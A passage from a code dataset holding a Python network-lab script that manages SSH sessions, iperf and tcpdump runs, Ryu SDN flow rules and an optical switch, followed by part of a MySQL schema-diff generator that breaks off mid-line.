threading\nimport requests\nimport socket\nfrom fabric import Connection # this library uses threading\nfrom jumpssh import SSHSession # this library is blocking\nfrom pssh.config import HostConfig #This library worked.\nfrom pssh.clients import ParallelSSHClient\nimport pssh.clients\nimport datetime\n\n'''\n====================================\nDEFINITIONS\n====================================\n'''\n\n'''\ndefine gateways and vms in the json file\ngateways: {ID: [IP, username, password]}\nvms: {ID: [IP, username, password, Gateway ID]} where gw id is the host server ID for the VM\n\n'''\nIPERF_TIME = 60 # duration of the experiment, in seconds\nRECONFIGURATION_1=20\nRECONFIGURATION_2=40\nBW_IPERF = '5g' # bandwidth for the experiment\n\ncredentials = json.load(open('credentials.json'))\n\n# define the URL of the sdn controller app ofctl_rest\nOFCTL_REST_IP = credentials['ip']\nADD_FLOW_URI = credentials['add_flow']\nCLEAR_FLOWS_URI = credentials['clear_flow']\nDELETE_FLOWS_URI = credentials['delete_flow']\n\n# datapath ID of virtual bridges in pica8 switch\nDPID_BR1 = int(credentials['dpid'][0])\nDPID_BR2 = int(credentials['dpid'][1])\nDPID_BR3 = int(credentials['dpid'][2])\nDPID_BR4 = int(credentials['dpid'][3])\n\n# define the gateway and vm credentials for ssh\ngateway_credentials = credentials['gateway_credentials']\nvm_credentials = credentials['vm_credentials']\n\n# tcpdump directory\n#TCP_TEST_DIRECTORY = credentials['tcpdump_file_datapath'],\nTCP_TEST_DIRECTORY = \"Desktop/pcap_files/\"\n'''\n====================================\nSection 1: SSH connection to the virtual machines.\n====================================\n'''\n\n'''\nThis method will connect to the gateways and to the virtual machines through the gateways. \n Gateway: host server\n virtual machine: hosted in the gateway\n\n This script is running on monitor1 server\n Current topology: \n |----vm1\n |---- node1 |\n | |----vm2\n monitor1 -------switch1\n | |----vm3\n |---- node2 |\n |----vm4\n'''\n\n\n# Method using jumpssh\ndef connect_to_vms_jumpssh(gateway_credentials=gateway_credentials, vm_credentials=vm_credentials):\n gateway_session = {}\n vm_session = {}\n # 1. Create the ssh connection to the gateways (host servers)\n for i, val in enumerate(gateway_credentials.keys()):\n try:\n gateway_session[val] = SSHSession(host=gateway_credentials[val][0],\n username=gateway_credentials[val][1],\n password=gateway_credentials[val][2]).open()\n\n except:\n print('Could not connect to host server: ' + gateway_credentials[val][0])\n print('connected to host servers')\n # 2. Create the ssh connection to the virtual machines (guest servers)\n for i, val in enumerate(vm_credentials.keys()):\n try:\n # vm_credentials[val][3] has the host server ID, the key in the gateway sessions dict.\n vm_session[val] = gateway_session[str(vm_credentials[val][3])].get_remote_session(\n host=vm_credentials[val][0],\n username=vm_credentials[val][1],\n password=vm_credentials[val][2])\n except:\n print('Could not connect to guest vm: ' + vm_credentials[val][0])\n print('connected to guest vms')\n return gateway_session, vm_session\n\n# https://stackoverflow.com/questions/51237956/python-how-do-i-authenticate-ssh-connection-with-fabric-module\n# Method using fabric\ndef connect_to_vms_fabric(gateway_credentials=gateway_credentials, vm_credentials=vm_credentials):\n gateway_session = {}\n vm_session = {}\n # 1. Create the ssh connection to the gateways (host servers)\n for i, val in enumerate(gateway_credentials.keys()):\n try:\n gateway_session[val] = Connection(host=gateway_credentials[val][0],\n user=gateway_credentials[val][1],\n connect_kwargs={'password': gateway_credentials[val][2]})\n except:\n print('Could not connect to host server: ' + gateway_credentials[val][0])\n print('connected to host servers')\n # 2. Create the ssh connection to the virtual machines (guest servers)\n for i, val in enumerate(vm_credentials.keys()):\n try:\n # vm_credentials[val][3] has the host server ID, the key in the gateway sessions dict.\n vm_session[val] = Connection(\n host=vm_credentials[val][0],\n user=vm_credentials[val][1],\n connect_kwargs={'password': vm_credentials[val][2]},\n gateway=gateway_session[str(vm_credentials[val][3])])\n except:\n print('Could not connect to guest vm: ' + vm_credentials[val][0])\n print('connected to guest vms')\n return gateway_session, vm_session\n\n# Method using parallel ssh\ndef connect_to_vms_pssh(gateway_credentials=gateway_credentials, vm_credentials=vm_credentials):\n gateway_session = {}\n vm_session = {}\n # 1. Create the ssh connection to the gateways (host servers)\n for i, val in enumerate(gateway_credentials.keys()):\n try:\n gateway_session[val] = \\\n pssh.clients.ParallelSSHClient(\n hosts=[gateway_credentials[val][0]],\n host_config=[HostConfig(user=gateway_credentials[val][1],\n password=gateway_credentials[val][2])])\n\n except:\n print('Could not connect to host server: ' + gateway_credentials[val][0])\n print('connected to host servers')\n # 2. Create the ssh connection to the virtual machines (guest servers)\n for i, val in enumerate(vm_credentials.keys()):\n try:\n # vm_credentials[val][3] has the host server ID, the key in the gateway sessions dict.\n vm_session[val] = pssh.clients.ParallelSSHClient(\n hosts=[vm_credentials[val][0]],\n host_config=[HostConfig(user=vm_credentials[val][1],\n password=vm_credentials[val][2],\n proxy_host=gateway_credentials[str(vm_credentials[val][3])][0],\n proxy_user=gateway_credentials[str(vm_credentials[val][3])][1],\n proxy_password=gateway_credentials[str(vm_credentials[val][3])][2])]\n )\n except:\n print('Could not connect to guest vm: ' + vm_credentials[val][0])\n print('connected to guest vms')\n print('---done---')\n return gateway_session, vm_session\n\n\n# run iperf client\ndef iperf_c(vm, t=IPERF_TIME, b='', ip_s='10.0.0.4'):\n #output = vm.run_command('hostname')\n print('running iperf client')\n #for line in output[0].stdout:\n # print(line)\n cmd = 'iperf3 -c ' + ip_s + ' -t ' + str(t)\n if b != '':\n cmd += ' -b ' + str(b)\n vm.run_command(cmd)\n print('---done---')\n return None\n\n\n# run iperf server\ndef iperf_s(vm):\n #output = vm.run_command('hostname')\n print('running iperf server')\n #for line in output[0].stdout:\n # print(line)\n vm.run_command('iperf3 -s -1')\n print('---done---')\n return None\n\n# run hostname server\ndef hostname(vm):\n output = vm.run_command('hostname')\n print('running hostname on: ')\n for line in output[0].stdout:\n print(line)\n print('---done---')\n return None\n\n# run tcpdump\n# https://parallel-ssh.readthedocs.io/en/latest/advanced.html?highlight=sudo#run-with-sudo\ndef tcpdump_vm(vm, endpoints,\n sudo_password=vm_credentials['1'][2],\n test_type='single',\n directory=TCP_TEST_DIRECTORY,\n t=IPERF_TIME+3,\n bw=BW_IPERF,\n vm_nic='enp2s0',\n capture_size=96):\n #output = vm.run_command('hostname')\n print('running tcpdump')\n #for line in output[0].stdout:\n # print(line)\n # filename structure: 'bandwidth)endpoints)test_type)mm_dd_yyyy-hh-mm-ss.pcap'\n # https://www.programiz.com/python-programming/datetime/strftime\n\n filename = bw + \")\"+endpoints + \")\" + test_type + \")\"+datetime.datetime.now().strftime(\"%m_%d_%Y-%H_%M_%S\")+'.pcap'\n command='timeout ' + str(t)\n command+= ' tcpdump -i ' + vm_nic\n command+= ' -s '+ str(capture_size)\n command+= ' -w ' + directory\n command+= filename\n print(command)\n #out = vm.run_command(command)\n vm.run_command(command)\n print('---done---')\n return None\n\n'''\n===========================================\nSection 2: HTTP requests to the OFCTL_REST.py app of the Ryu controller \non controller1 server\n===========================================\n'''\n# this method helps to create the payload required to add a flow.\ndef ofctl_flow_payload(dpid, action,\n in_port, out_port,\n ip_src, ip_dst, priority=10):\n if action == 'ADD':\n type_str_begin = '\"instructions\": [{\"type\": \"APPLY_ACTIONS\",'\n type_str_end = '}] '\n output_match = ''\n elif action == 'DELETE':\n type_str_begin = ''\n type_str_end = ''\n output_match = '\"out_port\": ' + str(out_port) + ',' # this field is not a valid match field, so should remove.\n\n payload = '{\"dpid\":' + str(dpid) + ',\\\n \"table_id\": 0,\\\n \"priority\": ' + str(priority) + ',\\\n \"match\":{\\\n \"in_port\":' + str(in_port) + ',' \\\n + output_match + \\\n '\"dl_type\":0x0800,\\\n \"nw_src\":\"' + ip_src + '\",\\\n \"nw_dst\":\"' + ip_dst + '\" \\\n },' + type_str_begin + '\\\n \"actions\": [\\\n {\\\n \"port\": ' + str(out_port) + ',\\\n \"type\": \"OUTPUT\"\\\n }\\\n ]' \\\n + type_str_end + \\\n '}'\n\n # r = requests.post(url=OFCTL_REST_IP+ADD_FLOW_URI, data=payload)\n return payload\n\n\n# TEMPORARY METHOD TO ADD THE FLOWS FOR VM1 TO VM4 through TRUNK1 (higher priority) and TRUNK2 (lower priority),\ndef add_flows_vm1_vm4():\n # Add flows for bridge 0:\n # Trunk1:\n flow1_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR1, in_port=1, out_port=5, ip_src='10.0.0.1',\n ip_dst='10.0.0.4', priority=10)\n flow2_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR1, in_port=5, out_port=1, ip_src='10.0.0.4',\n ip_dst='10.0.0.1', priority=10)\n # Trunk2:\n flow3_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR1, in_port=1, out_port=7, ip_src='10.0.0.1',\n ip_dst='10.0.0.4', priority=5)\n flow4_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR1, in_port=7, out_port=1, ip_src='10.0.0.4',\n ip_dst='10.0.0.1', priority=5)\n\n # Add flows for bridge 1:\n # Trunk1:\n flow5_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR4, in_port=6, out_port=4, ip_src='10.0.0.1',\n ip_dst='10.0.0.4', priority=10)\n flow6_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR4, in_port=4, out_port=6, ip_src='10.0.0.4',\n ip_dst='10.0.0.1', priority=10)\n # Trunk2:\n flow7_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR4, in_port=8, out_port=4, ip_src='10.0.0.1',\n ip_dst='10.0.0.4', priority=5)\n flow8_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR4, in_port=4, out_port=8, ip_src='10.0.0.4',\n ip_dst='10.0.0.1', priority=5)\n # Now add all the flows\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow1_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow2_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow3_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow4_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow5_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow6_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow7_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow8_payload)\n print('adding flows')\n return None\n\n# TEMPORARY METHOD TO ADD THE FLOWS FOR VM1 TO VM4 through TRUNK1 (higher priority) and TRUNK2 (lower priority),\ndef add_flows_vm1_vm4_v2():\n # Trunk1:\n add_flows_trunk1(priority=10)\n add_flows_trunk1(priority=5)\n # Trunk2:\n add_flows_trunk2(priority=7)\n print('adding flows v2')\n return 0\n\n# delete flows that match certain conditions.\n\n# clear flows per bridge\ndef del_all_flows(dpid):\n r = requests.delete(url=OFCTL_REST_IP + CLEAR_FLOWS_URI + str(dpid))\n return None\n\n# TEMPORARY METHOD TO DELETE THE FLOWS FOR VM1 TO VM4 BETWEEN TRUNK1\n# must use delete_strict URI to consider deleting flows matching priority.\ndef del_flows_trunk1(priority=10):\n flow1_payload = ofctl_flow_payload(dpid=DPID_BR1, in_port=1, out_port=5, ip_src='10.0.0.1', ip_dst='10.0.0.4',\n action='DELETE', priority=priority)\n flow2_payload = ofctl_flow_payload(dpid=DPID_BR1, in_port=5, out_port=1, ip_src='10.0.0.4', ip_dst='10.0.0.1',\n action='DELETE', priority=priority)\n flow3_payload = ofctl_flow_payload(dpid=DPID_BR4, in_port=6, out_port=4, ip_src='10.0.0.1', ip_dst='10.0.0.4',\n action='DELETE', priority=priority)\n flow4_payload = ofctl_flow_payload(dpid=DPID_BR4, in_port=4, out_port=6, ip_src='10.0.0.4', ip_dst='10.0.0.1',\n action='DELETE', priority=priority)\n\n r = requests.post(url=OFCTL_REST_IP + DELETE_FLOWS_URI, data=flow1_payload)\n r = requests.post(url=OFCTL_REST_IP + DELETE_FLOWS_URI, data=flow2_payload)\n r = requests.post(url=OFCTL_REST_IP + DELETE_FLOWS_URI, data=flow3_payload)\n r = requests.post(url=OFCTL_REST_IP + DELETE_FLOWS_URI, data=flow4_payload)\n print('removing flows trunk1 with priority ' + str(priority))\n return\n\n\n# TEMPORARY METHOD TO DELETE THE FLOWS FOR VM1 TO VM4 BETWEEN TRUNK2\n# must use delete_strict URI to consider deleting flows matching priority.\ndef del_flows_trunk2(priority=7):\n flow1_payload = ofctl_flow_payload(dpid=DPID_BR1, in_port=1, out_port=7, ip_src='10.0.0.1', ip_dst='10.0.0.4',\n action='DELETE', priority=priority)\n flow2_payload = ofctl_flow_payload(dpid=DPID_BR1, in_port=7, out_port=1, ip_src='10.0.0.4', ip_dst='10.0.0.1',\n action='DELETE', priority=priority)\n flow3_payload = ofctl_flow_payload(dpid=DPID_BR4, in_port=8, out_port=4, ip_src='10.0.0.1', ip_dst='10.0.0.4',\n action='DELETE', priority=priority)\n flow4_payload = ofctl_flow_payload(dpid=DPID_BR4, in_port=4, out_port=8, ip_src='10.0.0.4', ip_dst='10.0.0.1',\n action='DELETE', priority=priority)\n\n r = requests.post(url=OFCTL_REST_IP + DELETE_FLOWS_URI, data=flow1_payload)\n r = requests.post(url=OFCTL_REST_IP + DELETE_FLOWS_URI, data=flow2_payload)\n r = requests.post(url=OFCTL_REST_IP + DELETE_FLOWS_URI, data=flow3_payload)\n r = requests.post(url=OFCTL_REST_IP + DELETE_FLOWS_URI, data=flow4_payload)\n print('removing flows trunk2 with priority ' + str(priority))\n return\n\n# TEMPORARY METHOD TO ADD THE FLOWS FOR VM1 TO VM4 BETWEEN TRUNK1 ONLY\n# must use delete_strict URI to consider deleting flows matching priority.\ndef add_flows_trunk1(priority=3):\n # Add flows for bridge 0:\n # Trunk1:\n flow1_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR1, in_port=1, out_port=5, ip_src='10.0.0.1',\n ip_dst='10.0.0.4', priority=priority)\n flow2_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR1, in_port=5, out_port=1, ip_src='10.0.0.4',\n ip_dst='10.0.0.1', priority=priority)\n\n # Add flows for bridge 1:\n # Trunk1:\n flow5_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR4, in_port=6, out_port=4, ip_src='10.0.0.1',\n ip_dst='10.0.0.4', priority=priority)\n flow6_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR4, in_port=4, out_port=6, ip_src='10.0.0.4',\n ip_dst='10.0.0.1', priority=priority)\n\n # Now add all the flows\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow1_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow2_payload)\n\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow5_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow6_payload)\n\n print('adding flows')\n return None\n\ndef add_flows_trunk2(priority=5):\n # Add flows for bridge 0:\n # Trunk1:\n flow1_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR1, in_port=1, out_port=7, ip_src='10.0.0.1',\n ip_dst='10.0.0.4', priority=priority)\n flow2_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR1, in_port=7, out_port=1, ip_src='10.0.0.4',\n ip_dst='10.0.0.1', priority=priority)\n\n # Add flows for bridge 1:\n # Trunk1:\n flow5_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR4, in_port=8, out_port=4, ip_src='10.0.0.1',\n ip_dst='10.0.0.4', priority=priority)\n flow6_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR4, in_port=4, out_port=8, ip_src='10.0.0.4',\n ip_dst='10.0.0.1', priority=priority)\n\n # Now add all the flows\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow1_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow2_payload)\n\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow5_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow6_payload)\n\n print('adding flows trunk 2 with priority ' + str(priority))\n return None\n\ndef edit_bidirectional_flows(dpid,in_port,out_port,ip_src,ip_dst,action='ADD',priority=1):\n forward_flow_payload = ofctl_flow_payload(action=action, dpid=dpid,\n in_port=in_port, out_port=out_port,\n ip_src=ip_src,ip_dst=ip_dst, priority=priority)\n\n reverse_flow_payload = ofctl_flow_payload(action=action, dpid=dpid,\n in_port=out_port, out_port=in_port,\n ip_src=ip_dst, ip_dst=ip_src, priority=priority)\n\n # Now add all the flows\n if action == 'ADD':\n URI = ADD_FLOW_URI\n else:\n URI = DELETE_FLOWS_URI\n r = requests.post(url=OFCTL_REST_IP + URI, data=forward_flow_payload)\n r = requests.post(url=OFCTL_REST_IP + URI, data=reverse_flow_payload)\n print(str(action)+' flows on bridge '+str(dpid) + \" for ips@ports \"\n + str(ip_src)+'@'+ str(in_port) + ', '\n + str(ip_dst)+'@'+ str(out_port)\n + ' with priority ' + str(priority))\n return None\n\ndef edit_flows_vm1_vm4_short_path(action='ADD',priority=9):\n # edit flows for bridge 1:\n edit_bidirectional_flows(action=action, dpid=DPID_BR1, in_port=1, out_port=5,\n ip_src='10.0.0.1', ip_dst='10.0.0.4', priority=priority)\n # edit flows for bridge 4:\n edit_bidirectional_flows(action=action, dpid=DPID_BR4, in_port=6, out_port=4,\n ip_src='10.0.0.1', ip_dst='10.0.0.4', priority=priority)\n return None\n\ndef edit_flows_vm2_vm3_long_path(action='ADD',priority=8):\n # edit flows for bridge 2:\n edit_bidirectional_flows(action=action, dpid=DPID_BR2, in_port=2, out_port=22,\n ip_src='10.0.0.2', ip_dst='10.0.0.3', priority=priority)\n # edit flows for bridge 3:\n edit_bidirectional_flows(action=action, dpid=DPID_BR3, in_port=23, out_port=3,\n ip_src='10.0.0.2', ip_dst='10.0.0.3', priority=priority)\n # edit flows for bridge 1:\n edit_bidirectional_flows(action=action, dpid=DPID_BR1, in_port=21, out_port=5,\n ip_src='10.0.0.2', ip_dst='10.0.0.3', priority=priority)\n # edit flows for bridge 4:\n edit_bidirectional_flows(action=action, dpid=DPID_BR4, in_port=6, out_port=24,\n ip_src='10.0.0.2', ip_dst='10.0.0.3', priority=priority)\n\n return None\n\ndef edit_flows_vm2_vm3_long_path_backup(action='ADD',priority=10):\n # edit flows for bridge 2:\n edit_bidirectional_flows(action=action, dpid=DPID_BR2, in_port=2, out_port=10,\n ip_src='10.0.0.2', ip_dst='10.0.0.3', priority=priority)\n # edit flows for bridge 3:\n edit_bidirectional_flows(action=action, dpid=DPID_BR3, in_port=12, out_port=3,\n ip_src='10.0.0.2', ip_dst='10.0.0.3', priority=priority)\n # edit flows for bridge 1:\n edit_bidirectional_flows(action=action, dpid=DPID_BR1, in_port=9, out_port=5,\n ip_src='10.0.0.2', ip_dst='10.0.0.3', priority=priority)\n # edit flows for bridge 4:\n edit_bidirectional_flows(action=action, dpid=DPID_BR4, in_port=6, out_port=11,\n ip_src='10.0.0.2', ip_dst='10.0.0.3', priority=priority)\n return None\n\ndef edit_flows_vm2_vm3_short_path(action='ADD', priority=6):\n # Add flows for bridge 2:\n edit_bidirectional_flows(action=action, dpid=DPID_BR2, in_port=2, out_port=7,\n ip_src='10.0.0.2', ip_dst='10.0.0.3', priority=priority)\n # Add flows for bridge 3:\n edit_bidirectional_flows(action=action, dpid=DPID_BR3, in_port=8, out_port=3,\n ip_src='10.0.0.2', ip_dst='10.0.0.3', priority=priority)\n return None\n\n'''\n**********************************************\nMethods for opening a TCP socket and send commands to the optical switch. \nProtocol: SCPI\n**********************************************\n'''\n\n#Open TCP socket\ndef ots_connect_tcp_socket(ip, port):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((ip, port))\n return s\n\n#https://stackoverflow.com/questions/63214198/when-creating-bytes-with-b-prefix-before-string-what-encoding-does-python-use\ndef ots_connect_port(s, port_in, port_out):\n port_in_str = ','.join(str(i) for i in port_in)\n port_out_str = ','.join(str(i) for i in port_out)\n cmd = ':oxc:swit:conn:only (@{0}),(@{1}); stat?\\r\\n'.format(port_in_str, port_out_str)\n cmd = bytes(cmd, 'utf-8')\n s.sendall(cmd)\n #reply = s.recv(4096) #Reading from recv adds to the total execution time\n #return reply\n return None\n\ndef ots_disconnect_all(s):\n cmd=b':oxc:swit:disc:all\\r\\n'\n s.sendall(cmd)\n return None\n\n","repo_name":"sansastra/ngncs_hpc","sub_path":"ssh_flow_management.py","file_name":"ssh_flow_management.py","file_ext":"py","file_size_in_byte":23665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70447350291","text":"import re\n\n\n# 字段对象\nclass KeyObj():\n sql_str = \"\" # 原sql\n key_name = \"\" # 字段名\n type = \"\" # 类型\n len = \"\" # 长度\n not_null = \"\" # 是否null\n default = \"\" # 默认值\n comment = \"\" # 注释\n unsigned = \"\" # 是否无符号\n\n# 索引对象\nclass IndexObj():\n sql_str = \"\" # 原sql\n name = \"\" # 索引名\n field = [] # 索引字段\n\n# 表对象\nclass TableObj():\n sql_str = \"\" # 原sql\n table_name = \"\" # 表名\n key_map = {} # key:字段\n ordinary_key = {} # 普通键\n primary_key = None# 主键\n unique_key = {} # 联合键\n param = \"\" # 表参数\n \n def __init__(self):\n self.key_map = {}\n self.ordinary_key = {}\n self.primary_key = None\n self.unique_key = {}\n \n\n# 解析sql文件\ndef analysis_sql_file(path):\n with open(path, 'r', encoding = 'utf8') as f:\n sql_str = f.readlines()\n sql_str = \"\".join(sql_str)\n return analysis_sql_str(sql_str)\n\n# 解析sql str\ndef analysis_sql_str(sql_str):\n # 切割每一个表\n table_map = {}\n table_arr = sql_str.split(\"CREATE TABLE\")\n for tmp_table_str in table_arr:\n # 填过空白行\n if tmp_table_str.isspace() or tmp_table_str == \"\":\n continue\n # 保持完整性\n table_obj = str_to_table_obj(\"CREATE TABLE\" + tmp_table_str)\n table_map[table_obj.table_name] = table_obj\n return table_map\n\n# 解析数据库表结构\ndef analysis_db_table(cursor, db_name):\n # 不存在就创建库\n cursor.execute(\"create database if not exists %s\"%(db_name))\n cursor.execute(\"use %s\"%(db_name))\n # 获取表名\n # sql = \"select table_name from information_schema.tables where table_schema='%s' and table_type='base table';\\n\"%(db_name)\n sql = \"show tables;\"\n cursor.execute(sql)\n # 读取表名\n table_name_list = []\n results = cursor.fetchall()\n for row in results:\n table_name_list.append(row[0])\n \n # 获取创表sql\n sql_str = \"\"\n # print(\"analysis_db_table db_name:%s table_name_list:%s\"%(db_name, table_name_list))\n for table_name in table_name_list:\n cursor.execute(\"show create table %s\"%(table_name))\n # results = cursor.fetchall()\n one_results = cursor.fetchone()\n sql_str += (one_results[1] + \";\\n\")\n \n return analysis_sql_str(sql_str)\n\n# 创建差异变化sql\ndef create_diff_sql(table_map, db_table_map):\n # 新加的表\n add_table_sql = \"\"\n for table_name in table_map:\n if table_name not in db_table_map:\n print(\"table_map %s\"%(table_map.keys()))\n print(\"db_table_map %s\"%(db_table_map.keys()))\n add_table_sql += table_map[table_name].sql_str\n \n # 删除的表\n delete_table_sql = \"\"\n for table_name in db_table_map:\n if table_name not in table_map:\n delete_table_sql += \"DROP TABLE %s;\\n\"%(table_name)\n \n # 对比已存在的表差异\n modify_table_sql = \"\"\n for table_name in table_map:\n if table_name in db_table_map:\n diff_sql_str = table_diff(table_map[table_name], db_table_map[table_name])\n modify_table_sql += diff_sql_str\n return add_table_sql + delete_table_sql + modify_table_sql\n \n\n\n# str转TableObj\ndef str_to_table_obj(sql_str):\n table_obj = TableObj()\n table_obj.sql_str = sql_str\n # 获取表名\n sql_str = get_table_name(table_obj, sql_str)\n # 获取字段\n sql_str = get_table_val(table_obj, sql_str)\n # 获取键\n get_table_key(table_obj, sql_str)\n return table_obj\n\n# 获取表名\ndef get_table_name(table_obj:TableObj, sql_str:str):\n # print(\"sql_str:%s\\n\"%(sql_str))\n # 表名\n table_obj.table_name,sql_str = get_str_by_begin_end(sql_str, \"`\", \"`\")\n # 表字段\n field_str,sql_str = get_str_by_begin_end(sql_str, \"(\", \"\\n)\")\n # 表参数\n param_end = sql_str.find(\";)\")\n table_obj.param = sql_str[: param_end]\n # print(\"table_obj.table_name:%s\\n\"%(table_obj.table_name))\n # print(\"table_obj.param:%s\\n\"%(table_obj.param))\n # print(\"field_str:%s\\n\"%(field_str))\n return field_str\n \n # re实现\n # matchObj = re.match( r\".*?`(.*?)`.*?\\((.*)\\) (.*);.*\", sql_str, re.M|re.S)\n # # 表名\n # table_obj.table_name = matchObj.group(1)\n # sql_str = matchObj.group(2)\n # # 表参数\n # table_obj.param = matchObj.group(3)\n # return sql_str\n\n# 获取字段\ndef get_table_val(table_obj:TableObj, sql_str:str):\n while True :\n sql_str = sql_str.lstrip()\n # 是否还是字段行\n if sql_str.find(\"`\") != 0:\n break\n \n # find实现\n # 字段str范围\n key_str_end = sql_str.find(\"\\n\")\n key_str = sql_str[:key_str_end]\n sql_str = sql_str[key_str_end:]\n # 获取key\n key_obj = KeyObj()\n key_obj.sql_str = key_str\n key_obj.key_name,key_str = get_str_by_begin_end(key_str, \"`\", \"`\")\n # 获取注释\n key_obj.comment,_tmp = get_str_by_begin_end(key_str, \"COMMENT '\", \"'\")\n # 获取默认值\n key_obj.default,_tmp = get_str_by_begin_end(key_str, \"DEFAULT '\", \"'\")\n # 是否无符号\n if key_str.find(\"unsigned\") != -1:\n key_obj.unsigned = \"unsigned\"\n # 获取是否不为空\n if key_str.find(\"NOT NULL\") != -1:\n key_obj.not_null = \"NOT NULL\"\n # 获取类型和长度\n key_str = key_str.lstrip()\n matchObj = re.match( r\".*? (.*?)\\((.*?)\\).*\", key_str, re.M|re.S)\n if matchObj:\n key_obj.type = matchObj.group(1)\n key_obj.len = matchObj.group(2)\n else:\n # 不是type(len)格式\n matchObj = re.match( r\"(.*?) .*\", key_str, re.M|re.S)\n key_obj.type = matchObj.group(1)\n key_obj.type = key_obj.type.strip()\n key_obj.len = 0\n \n # # re实现\n # # 字段str范围\n # matchObj = re.match( r\".*?`(.*?),\\n(.*)\", sql_str, re.M|re.S)\n # key_str = \"`\" + matchObj.group(1)\n # sql_str = matchObj.group(2)\n \n # # 获取key\n # key_obj = KeyObj()\n # key_obj.sql_str = key_str\n # matchObj = re.match( r\"`(.*?)`(.*)\", key_str, re.M|re.S)\n # key_obj.key_name = matchObj.group(1)\n # key_str = matchObj.group(2)\n \n # # 获取注释\n # matchObj = re.match( r\"(.*)COMMENT '(.*?)'(.*)\", key_str, re.M|re.S)\n # if matchObj:\n # key_obj.comment = matchObj.group(2)\n # key_str = matchObj.group(1) + matchObj.group(3)\n \n # # 获取默认值\n # matchObj = re.match( r\"(.*)DEFAULT '(.*?)'(.*)\", key_str, re.M|re.S)\n # if matchObj:\n # key_obj.default = matchObj.group(2)\n # key_str = matchObj.group(1) + matchObj.group(3)\n \n # # 获取是否不为空\n # matchObj = re.match( r\"(.*)NOT NULL(.*)\", key_str, re.M|re.S)\n # if matchObj:\n # key_obj.not_null = \"NOT NULL\"\n # key_str = matchObj.group(1) + matchObj.group(2)\n \n # # 获取类型和长度\n # key_str = key_str.lstrip()\n # matchObj = re.match( r\"(.*?)\\((.*?)\\).*\", key_str, re.M|re.S)\n # if matchObj:\n # key_obj.type = matchObj.group(1)\n # key_obj.len = matchObj.group(2)\n # else:\n # # 不是type(len)格式\n # matchObj = re.match( r\"(.*?) .*\", key_str, re.M|re.S)\n # key_obj.type = matchObj.group(1)\n # key_obj.type = key_obj.type.strip()\n # key_obj.len = 0\n \n # 添加到table_obj\n table_obj.key_map[key_obj.key_name] = key_obj\n print(\"key_map:%s\"%(table_obj.key_map.keys()))\n return sql_str\n\n# 获取键\ndef get_table_key(table_obj, sql_str):\n # 获取主键\n matchObj = re.match( r\"(.*)PRIMARY KEY \\((.*?)\\)(.*)\", sql_str, re.M|re.S)\n if matchObj:\n index_obj = IndexObj()\n primary_key = matchObj.group(2)\n primary_key = primary_key.replace(\"`\",\"\")\n index_obj.field = primary_key.split(\",\")\n index_obj.field = list_del_blank(index_obj.field)\n table_obj.primary_key = index_obj\n sql_str = matchObj.group(1) + matchObj.group(3)\n # 获取联合键\n while True:\n matchObj = re.match( r\"(.*)UNIQUE KEY `(.*?)` \\((.*?)\\)(.*)\", sql_str, re.M|re.S)\n if matchObj:\n index_obj = IndexObj()\n index_obj.name = matchObj.group(2)\n unique_key = matchObj.group(3)\n unique_key = unique_key.replace(\"`\",\"\")\n index_obj.field = unique_key.split(\",\")\n index_obj.field = list_del_blank(index_obj.field)\n table_obj.unique_key[index_obj.name] = index_obj\n sql_str = matchObj.group(1) + matchObj.group(4)\n else:\n break\n # 获取普通键\n while True :\n matchObj = re.match( r\"(.*)KEY `(.*?)` \\(`(.*?)`\\)(.*)\", sql_str, re.M|re.S)\n if matchObj:\n index_obj = IndexObj()\n index_obj.name = matchObj.group(2)\n key_list = matchObj.group(3)\n key_list = key_list.replace(\"`\",\"\")\n index_obj.field = key_list.split(\",\")\n index_obj.field = list_del_blank(index_obj.field)\n table_obj.ordinary_key[index_obj.name] = index_obj\n sql_str = matchObj.group(1) + matchObj.group(4)\n else:\n break\n\n# 生成两个表的差异sql, 第一个表为主\ndef table_diff(new_table, old_table):\n sql_str = \"\"\n table_name = new_table.table_name\n # 添加和修改的字段\n for key_name in new_table.key_map:\n new_key_obj:KeyObj = new_table.key_map[key_name]\n # 是否新字段\n if key_name not in old_table.key_map:\n sql_str += \"ALTER TABLE %s ADD \"%(table_name)\n sql_str += (key_obj_get_sql(new_key_obj))\n else:\n # 字段存在\n # 检查差异\n old_key_obj = old_table.key_map[key_name]\n # 字段类型和长度\n # or new_key_obj.not_null != old_key_obj.not_null \\\n if new_key_obj.type.lower() != 